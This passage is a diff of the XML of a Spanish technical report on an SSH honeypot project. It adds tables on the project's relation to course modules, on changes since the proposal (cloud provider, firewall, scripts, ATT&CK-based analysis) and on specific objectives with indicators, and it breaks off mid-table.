+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Proyecto orientado a perfiles de analista SOC y administración de sistemas, con repositorio público como portafolio profesional.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Media</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:before="60" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tabla 1. Relación del proyecto con los módulos profesionales del ciclo.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1954,7 +5387,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 1. Comparativa de honeypots SSH.</w:t>
+        <w:t xml:space="preserve">Tabla 2. Comparativa de honeypots SSH.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2082,6 +5515,629 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">Este documento constituye la memoria técnica del proyecto, describiendo la arquitectura del sistema, las decisiones de diseño, la metodología seguida, las tecnologías empleadas y las conclusiones extraídas del análisis de los ataques capturados.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Evolución respecto al Anteproyecto</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El anteproyecto planteaba la idea y un desarrollo en seis fases. Durante esta primera etapa el proyecto se ha estructurado en ocho fases con el desglose RFTP, se han automatizado el despliegue y el análisis, y el honeypot está en funcionamiento desde el 4 de octubre de 2026. La Tabla 3 resume los cambios y su motivo.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:type="pct" w:w="5000"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4"/>
+          <w:left w:val="single" w:color="auto" w:sz="4"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4"/>
+          <w:right w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
+        </w:tblBorders>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1429"/>
+        <w:gridCol w:w="1985"/>
+        <w:gridCol w:w="4525"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="900"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Aspecto</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Anteproyecto</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2850"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Situación actual y motivo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Plataforma cloud</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Oracle Cloud, capa gratuita</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Hetzner Cloud (CX23, Núremberg). Oracle no tuvo capacidad en más de 600 solicitudes y no había otras alternativas gratuitas viables.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Cortafuegos del servidor</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">UFW</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">iptables, más el Cloud Firewall del proveedor. UFW no permite crear la redirección NAT del puerto 22 con sus comandos.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Despliegue</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Pasos manuales</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Tres scripts idempotentes con comprobaciones que impiden perder el acceso al servidor.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Análisis</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Scripts Python para rankings y gráficas</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Analizador modular con geolocalización, ficheros capturados por hash, clientes SSH y clasificación automática en MITRE ATT&amp;CK con 50 pruebas.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Planificación</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Seis fases</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ocho fases con desglose RFTP, diagrama de Gantt y estimación de 109 horas.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Captura</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Dos o tres semanas</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Iniciada el 4 de octubre, diez días antes de lo previsto, y ampliada hasta finales de octubre.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Coste</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Gratuito</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Unos 15 € en total por el cambio de proveedor (véase el Presupuesto).</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:before="60" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tabla 3. Evolución del proyecto respecto al anteproyecto.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2653,6 +6709,752 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">Objetivos</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Objetivo General</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Desplegar y operar un honeypot SSH expuesto a Internet que capture ataques reales durante al menos tres semanas, y transformar esos datos en un informe de inteligencia de amenazas con la actividad clasificada según MITRE ATT&amp;CK y recomendaciones defensivas aplicables a cualquier servidor Linux.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Objetivos Específicos</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Cada objetivo específico se acompaña de un indicador verificable y de su estado a fecha de esta entrega (8 de octubre de 2026):</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:type="pct" w:w="5000"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4"/>
+          <w:left w:val="single" w:color="auto" w:sz="4"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4"/>
+          <w:right w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
+        </w:tblBorders>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2937"/>
+        <w:gridCol w:w="3413"/>
+        <w:gridCol w:w="1588"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Objetivo específico</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2150"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Indicador de cumplimiento</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Estado</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">OE1. Desplegar un servidor cloud bastionado cuyo acceso de administración no pueda comprometerse por fuerza bruta.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2150"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Escaneo externo con solo los puertos 22 y 2022 visibles; acceso como root y con contraseña rechazados en el 2022.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
